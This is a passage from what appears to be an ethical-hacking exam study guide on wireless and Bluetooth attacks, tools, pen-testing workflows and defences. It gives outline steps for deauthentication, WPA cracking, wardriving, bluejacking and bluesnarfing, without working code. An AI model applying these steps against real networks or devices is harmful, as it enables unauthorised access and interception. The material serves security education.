scam. In this attack, an attacker fools wireless users into connecting a laptop or mobile phone to a tainted hotspot by posing as a legitimate provider. He uses a bogus base station that someone connects to using the Wi-Fi wireless technology. By imitating the name of another, legitimate wireless provider, they can fool people into trusting the internet services that they are providing. When the users log into bank or e-mail accounts, the phishers have access to the entire transaction, since it is sent through their equipment. Unwitting web users are invited to log into the attacker's server with bogus login prompts, tempting them to give away sensitive information such as usernames and passwords. Often users are unaware they have been duped until well after the incident has occurred. Users think they have logged on to a wireless hotspot connection when in fact they have been tricked into connecting to the attacker's base station. The hacker jams the connection to the legitimate base station by sending a stronger signal within proximity to the wireless client thereby turning itself into an 'evil twin'. Availability attack The primary goal of an availability attack is to prevent legitimate users from accessing resources in a wireless network. Some examples of an availability attack are as follows: Disassociation attack: In this attack, the attacker destroys the connectivity between a station and access point. ARP cache poisoning attack: In this attack, the attacker sniffs data and sends a spoofed ARP message to the LAN. Data intended for the router or the network is received when the spoofed message is sent. Power saving attack: In this attack, the attacker can use the Traffic Indicating Map (TIM) message to fool the client to enter a sleep state which was designed for power saving. Access point theft: In this attack, the attacker removes an access point from a public place. DoS attack: In this attack, the attacker makes a computer resource unavailable to its intended users. Beacon flood: In this attack, the attacker makes it difficult for stations to find a legitimate access point by generating a number of counterfeit 802.11 beacons. Authenticate flood: In this attack, the attacker sends forged authentication or association to a target AP's association table from random MACs. De-authenticate flood: In this attack, the attacker disconnects users from an access point by flooding stations with forged disassociations or deauthentications. TKIP MIC exploit: In this attack, the attacker suspends WLAN service by generating invalid TKIP data to exceed the target AP's MIC error threshold. EAP-failure: In this attack, the attacker detects a valid 802.1X EAP exchange and sends a forged EAP-failure message to the station. Routing attack: It includes eavesdropping, hijacking, DoS, etc. Authentication attack The primary goal of an authentication attack is to successfully access unauthorized network resources by misusing identity of Wi-Fi clients, their personal information, login credentials, etc. Some examples of authentication attack are as follows: Application login theft: In this attack, the attacker captures user's login credentials from cleartext application protocols. PSK cracking: In this attack, the attacker uses a dictionary tool to recover a WPA/WPA2 PSK from captured key handshake frames. Shared key guessing: In this attack, the attacker performs 802.11 shared key authentication using vendor default, guessed, or cracked WEP keys. Domain login cracking: In this attack, the attacker uses a brute force or dictionary tool to recover user credentials by cracking NETBIOS password hashes. Identity theft: In this attack, the attacker captures a user's credentials from cleartext 802.1X identity response packets. Password speculation: In this attack, the attacker performs 802.1X authentication to guess the user password using a captured identity. LEAP cracking: In this attack, the attacker cracks the NT password hash using a dictionary attack tool to recover a user's credentials from captured 802.1X LEAP packets. VPN login cracking: In this attack, an attacker runs the brute force attack on VPN authentication protocols to recover a user's credentials. Rogue access point attack A rogue AP (rogue access point) is a wireless access point that has either been installed on a secure company network without explicit authorization from a local network administrator, or has been created to allow a cracker to conduct a man-in-the-middle attack. A rogue access point creates a security threat to large organizations because anyone with access to the premises can maliciously install an inexpensive wireless router that can allow access to a secure network to unauthorized parties. Rogue access points do not employ mutual authentication. Man-in-the-middle attack In a man-in-the-middle attack, the attacker connects to the victim's laptop to a fake WLAN Access Point (AP). For this, the attacker uses the device that receives Bluetooth packets in promiscuous mode. After that, the device sends forged packets to the mobile and laptop of the victim. In this attack, the attacker first records the Bluetooth session and then replies to it. The following steps should be taken to perform an MITM attack using Aircrack-ng: 1. Run airmon-ng in monitor mode and start airodump to discover SSIDs on the interface. 2. De-authenticate the client using aireplay-ng and associate your wireless card with the AP that you are accessing with aireplay-ng. Wireless ARP poisoning attack There is normal flow of wireless traffic between a user's wireless laptop and Access PointB. An attacker takes the following steps to perform the wireless ARP poisoning attack: 1. An attacker spoofs the MAC address of the user's wireless laptop to authenticate to Access PointA. 2. Access PointA sends updated MAC address info to the network routers and switches. The network routers and switches then update the routing and switching tables. 3. The traffic now destined from the network's backbone to the user's system is no longer sent to Access PointB. Unauthorized association Soft access points are useful in providing unauthorized association. Soft access points are client cards or embedded WLAN radios in some PDAs and laptops. They can be generated inadvertently or via a virus program. Attackers infect the machine of the victim and activate soft access points. This facilitates them to make an unauthorized connection to the enterprise network. Instead of connecting to an enterprise network through the actual access point, attackers connect to the enterprise network through soft access points. PDA Personal digital assistant (PDA) is a term for any small mobile hand-held device that provides computing and information storage and retrieval capabilities for business or personal use such as keeping schedule calendars and address book information. Most PDAs have a small keyboard. Some PDAs have an electronically sensitive pad that accepts handwriting. Ad hoc network Ad hoc is a basic topology of a wireless network. An ad hoc network consists of two or more wireless devices that communicate directly with each other. The wireless local area network (WLAN) network interface adapters in the wireless devices generate omni-directional signals within a limited range called basic service area (BSA). When two wireless devices come within the range of each other, they immediately form a two-node network and are able to communicate with each other. An ad hoc network is non-transitive. Ad hoc connection attack Wi-Fi clients communicate directly through an ad hoc mode that does not need an AP to relay packets. Ad hoc mode is inherently insecure. It does not provide strong authentication and encryption. Hence, attackers can easily connect to and compromise the enterprise client working in ad hoc mode. Jamming Jamming is a type of Web server attack that is used to compromise a wireless environment. It denies service to authorized users, as legitimate traffic is jammed by the overwhelming frequencies of illegitimate traffic. With the help of some tools, an attacker can easily jam the 2.4 GHz frequency in a way that drops the signal to a level where the wireless networks can no longer function. Some widely used consumer products exist, such as cordless phones, baby monitors, and Bluetooth-enabled devices, all capable of interrupting the signal of a wireless network and faltering traffic. The following are Wi-Fi jamming devices: Wi-Fi jamming Description devices MGT- P6 GPS Range: 10 ~ 20 meters, 4 antennas, 3G: 2110~2170 MHz, and Wi-Fi/ Bluetooth: 2400~2485 MHz Jammer MGT- 02 Jammer Range: 20~50 meters and 4 antennas MGT- MP200 Jammer Range: 50-75 m, Barrage + DDS sweep jamming 20 to 2500 MHz, and Omnidirectional antennas MGT- 03 Jammer Range: 0~40 meters and 4 antennas MGT- P6 WiFi Jammer Range: 10~20 meters, iDen - CDMA - GSM: 850~960 MHz, DCS - PCS: 1805~960 MHz, 3G: 2110~2170 MHz, Wi-Fi / Bluetooth: 2400~2485 MHz, and 4 antennas MGT- P3x13 Jammer Range: 50~200 meters and 3 frequency bands jammed Mobile phone jammer A mobile phone jammer is an instrument used to prevent cellular phones from receiving signals from or transmitting signals to base stations. When used, the jammer effectively disables cellular phones. These devices can be used in practically any location, but are found primarily in places where a phone call would be particularly disruptive because silence is expected. It blocks cell phone use by sending out radio waves along the same frequencies that cellular phones use. This causes enough interference with the communication between cell phones and towers to render the phones unusable. On most retail phones, the network would simply appear out of range. Email jamming Email jamming is the use of sensitive words in e-mails to jam the authorities that listen in on them by providing a form of a red herring and an intentional annoyance. In this attack, the attacker deliberately includes "sensitive" words and phrases in otherwise innocuous emails to ensure that these are picked up by the monitoring systems. As a result, the senders of these emails will eventually be added to a "harmless" list and their emails will be no longer intercepted; hence, it will allow them to regain some privacy. WAP Wireless Access Point (WAP) is a communication device that is capable of both transmitting and receiving signals in a wireless LAN. This unit is connected to servers or directly to a network and other devices using a standard cabled network protocol. WTLS Wireless Transport Layer Security (WTLS) is a security layer of WAP, which is specifically designed for a wireless environment. It provides privacy, data integrity, and authentication for client-server communications over a wireless network. WTLS ensures that a client and server are authenticated so that wireless transactions remain secure and the connection is encrypted. WTLS is required because a wireless network does not provide end-to-end security. WEP Wired Equivalent Privacy (WEP) is a security protocol for wireless local area networks (WLANs). It has two components, i.e., authentication and encryption. It provides security for wireless networks. WEP encrypts data on a wireless network by using a fixed secret key. WEP incorporates a checksum in each frame to provide protection against the attacks that attempt to reveal the key stream. IEEE 802.1X Authentication The IEEE 802.1X standard defines a method of authenticating and authorizing users to connect to an IEEE 802 LAN. It blocks users from accessing the network on the failure of authentication. IEEE 802.1X supports the Extensible Authentication Protocol-Transport Level Security (EAPTLS) and Protected EAP-Microsoft Challenge Handshake Authentication Protocol version 2 (PEAP-MS-CHAP v2) protocols. In the IEEE802.1X authentication system, an access point receives a connection request from a wireless client and forwards the request to the RADIUS server. The RADIUS server then uses the Active Directory database to determine whether the client should be granted access to the network. Shared Key Authentication Shared Key is an authentication method used by wireless LANs, which follow the IEEE 802.11 standard. Wireless devices authenticate each other by using a secret key that is kept by both devices. Shared Key authentication is not very secure, as all the computers in the basic service set (BSS) use the same key. Hence, any security lapse on one computer can compromise the security of the entire BSS. The WEP algorithm is required to be implemented to enable Shared Key authentication. 15.3 Understand wireless hacking methodology, and assess wireless hacking tools Exam Focus: Understand wireless hacking methodology, and assess wireless hacking tools. Objective includes: Understand wireless hacking methodology. Assess wireless hacking tools. Wireless hacking methodology The wireless hacking methodology is used to gain unauthorized access to network resources by compromising a Wi-Fi network. The following is the wireless hacking methodology: Wi-Fi discovery GPS mapping Wireless traffic analysis Launch wireless attacks Crack Wi-Fi encryption Finding Wi-Fi networks for attacks An attacker checks the potential networks that are in his range to determine the best one to attack. Use a Wi-Fi enabled laptop with a wireless discovery tool installed to map out active wireless networks. A laptop with Wi-Fi card, external Wi-Fi antenna, and network discovery programs can be used to discover Wi-Fi networks. Footprint the wireless network Discovering and footprinting the wireless networks begin in an active or passive way when an attack is made on a wireless network. The following are footprinting methods: Passive method: This method is used to detect the existence of the AP. It involves sniffing the packets from the airwaves. This will reveal the AP, SSID, and attacker's wireless devices that are live. Active method: In this method, a probe request with the SSID are sent by the attacker's wireless device to check whether the AP responds or not. The wireless device will send the probe request with an empty SSID if the wireless device does not have the SSID in the beginning. Wi-Fi discovery tools The following are Wi-Fi discovery tools: WiFi Hopper Wavestumbler iStumbler WiFinder Meraki WiFi Stumbler Wellenreiter AirCheck Wi-Fi Tester AirRadar 2 inSSIDer NetSurveyor NetStumbler Vistumbler WirelessMon NetSurveyor NetSurveyor is an 802.11 network discovery tool used to collect information about adjacent wireless access points in real time and display this information in an advantageous way. The data is displayed using various different diagnostic views and charts. Data can be recorded for later use. Generally, NetSurveyor generates reports in Adobe PDF format. NetStumbler NetStumbler is a Windows-based tool that is used for the detection of wireless LANs using the IEEE 802.11a, 802.11b, and 802.11g standards. It detects wireless networks and marks their relative position with a GPS. It uses an 802.11 Probe Request that has been sent to the broadcast destination address. When NetStumbler is connected to a GPS, it records a GPS coordinate for the highest signal strength found at each access point. The main features of NetStumbler are as follows: It displays the signal strength of a wireless network, MAC address, SISD, channel details, etc. It is commonly used for: 1. War driving 2. Detecting unauthorized access points 3. Detecting causes of interference on a WLAN 4. WEP ICV error tracking 5. Making Graphs and Alarms on 802.11 Data, including Signal Strength How to detect NetStumbler and identify it? NetStumbler uses an organizationally unique identifier (OID) of 0x00601d and a protocol identifier (PID) of 0x0001. It also uses a data payload size of 58 bytes containing a unique string that can be used to identify the version of NetStumbler. For example, Version 3.2.0 carries 'Flurble gronk bloopit, bnip Frundletrune', Version 3.2.3 has a payload string 'All your 802.11b are belong to us', and 3.3.0 has a payload string that is intentionally left blank. Hence, with the help of these fingerprints, not only can a network administrator easily detect the symptoms of NetStumbler, but he can also identify the version of NetStumbler being used by an attacker. Vistumbler Vistumbler is a wireless network scanner used to find out wireless access points. It is written in AutoIT for Vista, Windows 7, and Windows 8. Vistumbler uses the 'netsh wlan show networks mode=bssid' Vista command to get wireless information. It supports GPS and live Google Earth tracking. WirelessMon WirelessMon is a tool used to monitor the status of a wireless Wi-Fi adapter and collect information about nearby wireless access points and hot spots in real time. It logs all wireless information that it has collected into a file for archival purposes and future reference. GPS mapping An attacker creates a map of discovered Wi-Fi networks and uses statistics gathered by Wi-Fi discovery tools to create a database. GPS is used for tracking the location of the discovered WiFi networks and uploading the coordinates to sites such as WIGLE. WIGLE WIGLE (Wireless Geographic Logging Engine) is a GPS mapping tool. It is a Website used to collect information about various wireless hotspots around the world. Users can register on this site and upload hotspot data, such as GPS coordinates, SSID, MAC address, and the encryption type used on the hotspots discovered. Discover Wi-Fi network using Wardriving Take the following steps to discover Wi-Fi network using Wardriving: 1. Register with WIGLE and download map packs of your area in order to view the plotted access points on a geographic map. 2. Connect the antenna, GPS device to the laptop through a USB serial adapter and board on a car. 3. Install and launch NetStumbler and WIGLE client software and turn on the GPS device. 4. Drive the car at a speed of 35 mph or below. 5. Capture and save the NetStumbler log file that includes GPS coordinates of the access points. Upload this log file to WIGLE. This will then automatically plot the points onto a map. Wireless traffic analysis An attacker can identify vulnerabilities and susceptible victims in a target wireless network by performing wireless traffic analysis. Wireless traffic analysis is helpful in determining the strategy that is appropriate for a successful attack. Wireless packets can be easily sniffed and analyzed as traffic over the air is not serialized. The attacker analyzes a wireless network in order to determine broadcast SSID, presence of multiple access points, possibility of recovering SSIDs, authentication method used, and WLAN encryption algorithm. Wireless cards and chipsets It is important to select the right Wi-Fi card since tools such as Aircrack-ng and KisMAC are used only with selected wireless chipsets. AirPcap The AirPcap adapter is used to capture full 802.11 data, management, and control frames. These frames can be viewed in Wireshark for in-depth protocol dissection and analysis. AirPcap can decrypt WEP/WPA-encrypted frames if configured. It is used for traffic injection to secure the wireless network and is supported in Aircrack-ng, Cain & Abel, and Wireshark. Wireless sniffers The following are wireless sniffers: ApSniff NetworkMiner Airscanner Mobile Sniffer Observer WifiScanner Mognet AirTraf Prism2Dump CommView CommView is a network monitor and analyzer designed for an individual who wants a full picture of the traffic flowing through a PC or LAN segment. It is used to collect information from the wireless adapter and decode the analyzed data. OmniPeek OmniPeek is a packet analyzer software tool used for network troubleshooting and protocol analysis. The OmniPeek network analyzer offers an intuitive, easy-to-use graphical interface that engineers can use to rapidly analyze and troubleshoot enterprise networks. Kismet Kismet is a Linux-based 802.11 wireless network sniffer and intrusion detection system. It can work with any wireless card that supports raw monitoring (rfmon) mode. Kismet can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet can be used for the following tasks: To identify networks by passively collecting packets To detect standard named networks To detect masked networks To collect the presence of non-beaconing networks via data traffic Spectrum analyzer The RF spectrum analyzer performs the following functions: It examines the Wi-Fi radio transmission. It measures the power (amplitude) of radio signals and RF pulses and transfers the measurements into numeric sequences. Spectrum analyzers use statistical analysis to plot spectral usage, quantify air quality, and isolate transmission sources. RF technicians use RF spectrum analyzers for the following purposes: Install and maintain wireless networks. Identify sources of interference. Help in detection of wireless attacks Wi-Spy and Chanalyzer, AirMagnet Wi-Fi Analyzer, and WifiEagle are spectrum analysis tools. RF monitoring tools The following are RF monitoring tools: NetworkManager KWaveControl KWiFiManager NetworkControl Qwireless KOrinoco APHunter Wi-Fi Connection Manager tools The following are Wi-Fi Connection Manager tools: Aironet Wireless LAN Boingo Odyssey Access Client HandyWi Wireless Zero Config QuickLink Mobile Mobile Connect Intel PROSet Wi-Fi Traffic Analyzer tools The Wi-Fi Traffic Analyzer tools: Aruba Spectrum Analyzer OptiView Network Analyzer Ufasoft Snif Network Assistant AirMagnet Handheld Analyzer Network Packet Analyzer Network Observer vxSniffer Wi-Fi Raw Packet Capturing tools The following are Wi-Fi Raw Capturing tools: WirelessNetView Pirni Sniffer Tcpdump Airview PCAGizmo Wi-Fi Spectrum Analyzing tools The following are Wi-Fi Spectrum Analyzing tools: Cisco Spectrum Expert WifiSleuth Wi-Spy BumbleBee AirMedic Aircrack-ng suite Aircrack-ng suite is a network software suite that includes the following for 802.11 wireless networks: Detector Packet sniffer WEP WPA/WPA2- PSK cracker and analysis tool Disassociation attack The following image explains the working of a disassociation attack: Deauthentication attack The following image explains the working of a deauthentication attack: Hotspotter Hotspotter is a wireless hacking tool that is used to detect a rogue access point. It fools users to connect and authenticate with the hacker's tool. It sends the deauthenticate frame to the victim's computer that causes the victim's wireless connection to be switched to a non-preferred connection. Wireless Zero Configuration (WZC) Wireless Zero Configuration (WZC), also known as Wireless Auto Configuration or WLAN AutoConfig, is a wireless connection management utility included with Microsoft Windows XP and later operating systems as a service that dynamically selects a wireless network to connect on the basis of users' preferences and various default settings. This can be used instead of, or in the absence of, a wireless network utility from the manufacturer of a computer's wireless networking device. The drivers for the wireless adapter query the NDIS Object IDs and pass the available network names to the service. WZC also introduced some security threats, which are as follows: WZC will probe for networks that are already connected. This information can be viewed by anyone using a wireless analyzer and can be used to set up fake access points to connect. WZC attempts to connect to the wireless network with the strongest signal. Attackers can create fake wireless networks with high-power antennas and cause computers to associate with his access point. Airjack Airjack is a collection of wireless card drivers and related programs. It uses a program called monkey_jack that is used to automate the MITM attack. Wlan_jack is a DoS tool in the set of airjack tools which accepts a target source and BSSID to send continuous deauthenticate frames to a single client or an entire network. In the same way, we can use the tool essid_jack that can be used to send a disassociate frame to a target client in order to force the client to reassociate with the network and give up the network SSID. Ettercap Ettercap is a UNIX and Windows tool for computer network protocol analysis and security auditing. It is capable of intercepting traffic on a network segment, capturing passwords, and conducting active eavesdropping against a number of common protocols. It is free open source software. Ettercap supports active and passive dissection of many protocols (including ciphered ones) and provides many features for network and host analysis. AiroPeek AiroPeek is a Windows-based commercial wireless LAN analyzer for IEEE 802.11b. It supports all high level protocols such as TCP/IP, NetBEUI, IPX, etc. It can be used to perform the following tasks: Site surveys Security assessments Channel scanning Real time and past capture WEP decryption Client troubleshooting WLAN monitoring Remote WLAN analysis Application layer protocol analysis OpenBTS OpenBTS is a software-based GSM access point, allowing standard GSM-compatible mobile phones to make telephone calls without using existing telecommunication providers' networks. OpenBTS replaces the traditional GSM operator network switching subsystem infrastructure from the Base Transceiver Station (BTS) upwards. Instead of forwarding call traffic through to an operator's mobile switching centre (MSC), the calls are terminated on the same box by forwarding the data onto the Asterisk PBX via SIP and Voice-over-IP (VoIP). Bit-flipping attack A bit-flipping attack is an attack on a cryptographic cipher in which the attacker can change the ciphertext in such a way as to result in a predictable change of the plaintext, although the attacker is not able to learn the plaintext itself. Note that this type of attack is not directly against the cipher itself (as cryptanalysis of it would be), but against a particular message or series of messages. In the extreme, this could become a Denial of service attack against all messages on a particular channel using that cipher. The attack is especially dangerous when the attacker knows the format of the message. In such a situation, the attacker can turn it into a similar message but one in which some important information is altered. For example, a change in the destination address might alter the message route in a way that will force re-encryption with a weaker cipher, thus possibly making it easier for an attacker to decipher the message. 15.4 Understand Bluetooth hacking, and understand how to defend against Bluetooth hacking Exam Focus: Understand Bluetooth hacking, and understand how to defend against Bluetooth hacking. Objective includes: Understand Bluetooth hacking. Understand how to defend against Bluetooth hacking. Bluetooth hacking In Bluetooth hacking, Bluetooth stack implementation vulnerabilities are exploited so that sensitive data in Bluetooth-enabled devices and network can be compromised. Bluetooth enabled electronic devices connect and communicate wirelessly via piconets. Piconets are short range, ad hoc networks. Bluesmacking attack In a Bluesmacking attack, the attacker uses the Logical Link Control and Adaptation Layer Protocol (L2CAP) when performing this type of attack. For this, he creates a data packet larger than the allowable size in the device and sends it to the victim's device. Bluesnarfing In Bluesnarfing, an attacker steals information from a wireless device through a Bluetooth connection. For this attack, the attacker connects to the OBEX Push target and performs an OBEX GET request for known filenames, such as 'telecom/pb.vcf' for the devices phone book or 'telecom/cal.vcs' for the devices calendar file. Security issues while using Bluetooth The following are the security issues while using Bluetooth: Short PINs are allowed, which can be easily identified. The length of the Bluetooth encryption key is negotiable. In Bluetooth communication, unit key (a link key that one device generates and uses as a link key with any other device) can be reused, and once used, it becomes public. It can be used only under full trust environments because every paired device can copy any other device holding the same unit key. The master key of the pairing devices is shared. An attacker can gain unauthorized access to two other users if that attacker has communicated with either of the other two users before. In Bluetooth communications, only the device is authenticated, not individual users, which means anyone can use the device as long as it is authenticated. In Bluetooth communication, only the individual links are encrypted and authenticated. Security services such as auditing, non-reputation, etc. do not exist. Bluejacking Bluejacking is one of the most common attacks in Bluetooth hacking. In bluejacking, an attacker sends unsolicited messages over Bluetooth to Bluetooth-enabled devices such as PDA and mobile phones. Bluejack a victim Take the following steps to bluejack a victim: 1. Choose an area with plenty of mobile users. 2. Create a new contact on your phone address book. 3. Enter the message into the name field. 4. 5. 6. 7. Save the new contact. Select "send via Bluetooth". This makes a search for any Bluetooth device within range. Select one phone from the list that is discovered by Bluetooth and send the contact. You will get the message "card sent" and then listen for the SMS message tone of your victim's phone. Bluetooth stack The following is the Bluetooth stack: The following are Bluetooth modes: Discoverable: In this mode, inquiry responses are sent to all queries. Limited discoverable: In this mode, visibility is for a certain period of time. Non-discoverable: In this mode, inquiry scan is never answered. The following are pairing modes: Non-pairable mode: In this mode, every pairing request is rejected. Pairable mode: In this mode, request will be paired upon request. Bluetooth threats The following are Bluetooth threats: Leaking calendars and address books: User's personal information can be stolen and can be used by an attacker for malicious purposes. Bugging devices: An attacker can instruct the user to call other person using phone. The attacker can even record their communication. Sending SMS messages: Terrorists can use the phones of legitimate users to send false bomb threats to airlines. Causing financial loses: Hackers can use an international user's phone to send many MMS messages. This results in a high phone bill. Remote control: Hackers can remotely control a phone and make phone calls or connect to the Internet. Social engineering: Attackers trick Bluetooth users to lower security or disable authentication for Bluetooth connections to pair with them and steal information. Malicious code: Mobile phone worms can replicate and spread itself by exploiting a Bluetooth connection. Protocol vulnerabilities: An attacker exploits Bluetooth pairings and communication protocols for the following purposes: o Stealing data o Making call o Sending messages o Conducting DoS attacks on a device o Starting phone spying Bluebug attack In the Bluebug attack, an attacker exploits the loopholes of Bluetooth and gets unauthorized access to a Bluetooth-enabled device. By this attack, an attacker can perform the following unauthorized activities: Initiate the phone calls. Send an SMS to any number. Read SMS from the phone. Read and write the phonebook entries. Set the call forwards. Make an Internet connection. Short pairing code attack In a short pairing code attack, the attacker takes advantage of the pairing between two devices by sharing some secret which is used for future communication. For this, the attacker forces a pair of Bluetooth devices to repeat the pairing process and eavesdrop on it. BTKeylogging attack In a BTKeylogging attack, the attacker uses the PIN Cracking attack to discover the fixed PIN code of the target Bluetooth keyboard. This attack is possible if the target keyboard has a fixed PIN code and the attacker knows its BD_ADDR. The attacker uses a protocol analyzer for intercepting all required information and then uses the keyboard as a keylogger to identify all packets. BTVoiceBugging attack In a BTVoiceBugging attack, the attacker knows the fixed PIN of the target device. For this, he uses a protocol analyzer and opens a two-way real-time SCO/eSCO link with the headset. The BTVoiceBugging attack is possible when the attacker knows the fixed PIN of the target device. BlueSpam attack In a BlueSpam attack, the attacker finds out the other Bluetooth-enabled devices and sends a file to spam them. This attack is done by using the OBEX protocol. It can be done on any types of files, such as VCFs, simple ASCII text files, images files, audio, and video files. PhoneSnoop PhoneSnoop is BlackBerry spyware. An attacker can use PhoneSnoop to remotely activate the microphone of a BlackBerry handheld and listen to sounds near or around it. When PhoneSnoop is used to conduct surveillance on an individual, it solely demonstrates the capabilities of BlackBerry handheld. PhoneSnoop is purely a proof-of-concept application. It does not have the stealth or spyware features that can make it malicious. BlueScanner BlueScanner is a Bluetooth device discovery and vulnerability assessment tool for Windows. It discovers Bluetooth devices type such as phone, computer keyboard, and PDA and the services that the devices advertise. It records all information that can be collected from the device, without trying to authenticate with the remote device. Bluetooth hacking tools The following are Bluetooth hacking tools: BH Bluejack Bluesnarfer Bluediving Blooover BTScanner BTCrack BTBrowser BTCrawler Defending against Bluetooth hacking The following actions can be taken to defend against Bluetooth hacking: While pairing a device, non-regular patterns should be used as PIN keys. Key combinations that are non-sequential on the keyboard should be used. Encryption should be enabled when BT connection is established to your PC. A check of all paired devices should be kept in the past from time to time and any paired device about which you are not sure should be deleted. BT should be kept in the disabled state. It should be enabled only when required, and disabled immediately after the completion of the intended task. The device should be kept in non-discoverable (hidden) mode. Any unknown and unexpected request should not be accepted for pairing your device. Detecting and blocking rogue AP Detecting rogue AP involves the following: RF scanning: It involves plugging of re-purchased access points (used for only packet capturing and analysis) in all wired network for detecting and warning the WLAN administrator about any wireless devices operating in the nearby area. AP scanning: It involves using access points that detect neighboring APs operating in the nearby area to expose the data through its MIBS and web interface Using wired side input: It is used by network management software to detect rogue Aps. Network management software uses multiple protocols to detect devices in the LAN. The following actions should be taken to block rogue AP: A Denial of Service attack should be launched on the rogue AP to deny access to new clients. The switch port to which the AP is connected should be blocked or the AP should be manually located and pulled physically off the LAN. 15.5 Understand how to defend against wireless attacks, and identify Wi-Fi security tools Exam Focus: Understand how to defend against wireless attacks, and identify Wi-Fi security tools. Objective includes: Understand how to defend against wireless attacks. Identify Wi-Fi security tools. Defending against wireless attacks The following are Wi-Fi configuration best practices: The default SSID should be changed after WLAN configuration. The router access password should be set and firewall protection should be enabled. SSID broadcasts should be disabled. Remote router login and wireless administration should be disabled. MAC address filtering on your access point or router should be enabled. Encryption on the access point should be enabled and passphrase should be often changed. The following are SSID: best practices: SSID cloaking should be used to keep certain default wireless messages from broadcasting the ID to everyone. You should not use your SSID, company name, network name, or any easy to guess string in passphrases. A firewall or packet filter should be placed in between the AP and the corporate Intranet. The strength of the wireless network should be limited to prevent it from being detected outside the bounds of your organization. The wireless devices should be checked regularly for configuration or setup problems. A different technique should be implemented to encrypt traffic. The following are Wi-Fi authentication best practices: WPA should be chosen instead of WEP. WPA2 Enterprise should be implemented wherever possible. The network should be disabled when it is not needed. Wireless access points should be placed in a secured location. Drivers on all wireless equipment should be kept updated. A centralized server should be used for authentication. Wi-Fi security auditing tools The following are Wi-Fi security auditing tools: AirMagnet WiFi Analyzer: It is an industry standard tool used to perform mobile auditing and troubleshoot enterprise Wi-Fi networks. It helps IT staff in solving end-user problems related to security threats and wireless network vulnerabilities. AirMagnet WiFi Analyzer has a full compliance reporting engine that automatically maps collected network information to requirements for compliance with policy and industry regulations. AirDefense: It provides single UI-based platform for wireless monitoring, intrusion protection, automated threat mitigation, etc. It provides tools for the following: o Rogue detection o Policy enforcement o Intrusion prevention o Regulatory compliance AirDefense uses distributed sensors that operate in tandem with a hardened purpose-built server appliance in order to monitor all 802.11 (a/b/g/n) wireless traffic in real-time. In order to accurately detect all wireless attacks and anomalous behavior, AirDefense analyzes existing and day-zero threats in real-time against historical data. AirDefense enables the rewinding and reviewing of detailed wireless activity records. This is useful in forensic investigations and ensures policy compliance. Adaptive Wireless IPS (WIPS): It is used to provide wireless-network threat detection and mitigation against malicious attacks and security vulnerabilities. It can be used to detect, analyze, and identify wireless threats. WIPS Wireless intrusion prevention system (WIPS) monitors the radio spectrum for the presence of unauthorized, rogue access points and the use of wireless attack tools. The system monitors the radio spectrum used by wireless LANs, and immediately alerts a systems administrator whenever a rogue access point is detected. Conventionally, it is achieved by comparing the MAC address of the participating wireless devices. Rogue devices can spoof MAC address of an authorized network device as their own. WIPS uses the fingerprinting approach to weed out devices with spoofed MAC addresses. The idea is to compare the unique signatures exhibited by the signals emitted by each wireless device against the known signatures of pre-authorized, known wireless devices. Wi-Fi intrusion prevention systems The following are Wi-Fi intrusion prevention systems: SonicWall Wireless Networking Network Box IDP TippingPoint IPS 3Com AirProtect Newbury RF Firewall AirMobile Server SpectraGuard Enterprise WLS Manager Wi-Fi predictive planning tools The following are Wi-Fi predictive planning tools: AirMagnet Planner Networks RingMaster Control System Planning Tool Spot Predictive Site Survey SpectraGuard Planner Site Survey Professional LAN Planner Wi-Fi Planner Wi-Fi vulnerability scanning tools The following are Wi-Fi vulnerability scanning tools: Karma FastTrack Zenmap WiFiDEnum Nessus WiFiZoo OSWA Security Assessment Toolkit EAP-TLS Protocol Extensible Authentication Protocol-Transport Level Security (EAP-TLS) is an authentication protocol, which provides mutual authentication, integrity-protected negotiation of cryptographic service providers, and a secret key exchange between two systems that use public key cryptography. EAP-TLS works on a network that is configured for Public Key Infrastructure (PKI) and uses certificates for authentication. These certificates can be stored on computers or on smart cards. 15.6 Examine Wireless Penetration Testing Framework Exam Focus: Examine Wireless Penetration Testing Framework. Objective includes: Understand Wireless penetration testing. Examine Wireless Penetration Testing Framework. Wireless penetration testing Wireless penetration testing is used to actively evaluate information security measures implemented in a wireless network. It is used to analyze design weaknesses, technical flaws, and vulnerabilities. It is required due to the following reasons: Threat assessment: The wireless threats faced by the information assets of an organization are identified. Upgrading infrastructure: Existing infrastructure of software, hardware, or network design are changed or upgraded. Risk prevention and response: Comprehensive approach of preparation steps for preventing upcoming exploitation are provided. Security control auditing: The efficiency of wireless security protections and controls is to be tested and evaluated. Data theft detection: Streams of sensitive data are found by sniffing the traffic. Information system management: Information on security protocols, network strength, and connected devices is collected. In wireless penetration testing, a penetration tester needs to take the following steps: Wireless Discovery Packet Capturing Attacking WEP/ WPA Password Generating frames using frame generation software Using IDS tools Wireless penetration testing framework Wireless penetration testing framework includes the following steps: 1. Discover wireless devices. Document all the findings if a wireless device is found. 2. Perform a general Wi-Fi network attack and check whether the wireless device found uses WEP encryption or not if the wireless device is using a Wi-Fi network. 3. Perform WEP encryption pen testing or check whether WLAN uses WPA/WPA2 encryption or not if WLAN uses WEP encryption. 4. Perform WPA/WPA2 encryption pen testing or check whether WLAN uses LEAP encryption or not if WLAN uses WPA/WPA2 encryption. 5. Perform LEAP encryption pen testing or check whether WLAN is unencrypted or not if WLAN uses LEAP encryption. 6. Perform unencrypted pen testing or else perform Wi-Fi network attack if WLAN is unencrypted. General penetration steps for all wireless networks The following are general penetration steps for all wireless networks: 1. Create a rogue access point. Use tools such as Karma, Hotspotter, Airsnarf, etc. to deauthenticate the client and then check for client deauthentication. 2. If the client is deauthenticated, take the following steps: 1. Associate with the client. 2. Sniff the traffic. 3. Check if passphrase/certificate is acquired, or else deauthenticate the client again. 3. If passphrase is acquired, use the wzcook tool to crack the passphrase for stealing confidential information, or else deauthenticate the client again. Pen testing LEAP encrypted WLAN Pen testing LEAP encrypted WLAN includes the following steps: 1. Use tools such as Karma, Hotspotter, Airsnarf, etc. to deauthenticate the client. 2. If the client is deauthenticated, use tools such as asleap, THC-LEAP Cracker, etc. to break the LEAP encryption for stealing confidential information or else deauthenticate the client again. Pen testing WPA/WPA2 encrypted WLAN Pen testing WPA/WPA2 encrypted WLAN includes the following steps: 1. Use tools such as Karma, Hotspotter, Airsnarf, etc. to deauthenticate the client. 2. If the client is deauthenticated, take the following steps: 1. Sniff the traffic. 2. Check the status of capturing EAPOL handshake or else deauthenticate the client again. 3. If EAPOL handshake is captured, use tools such as coWPAtty, Aircrack-ng, etc. to perform WPA/WPA2 dictionary attack for stealing confidential information or else deauthenticate the client again. Pen testing WEP encrypted WLAN Pen testing 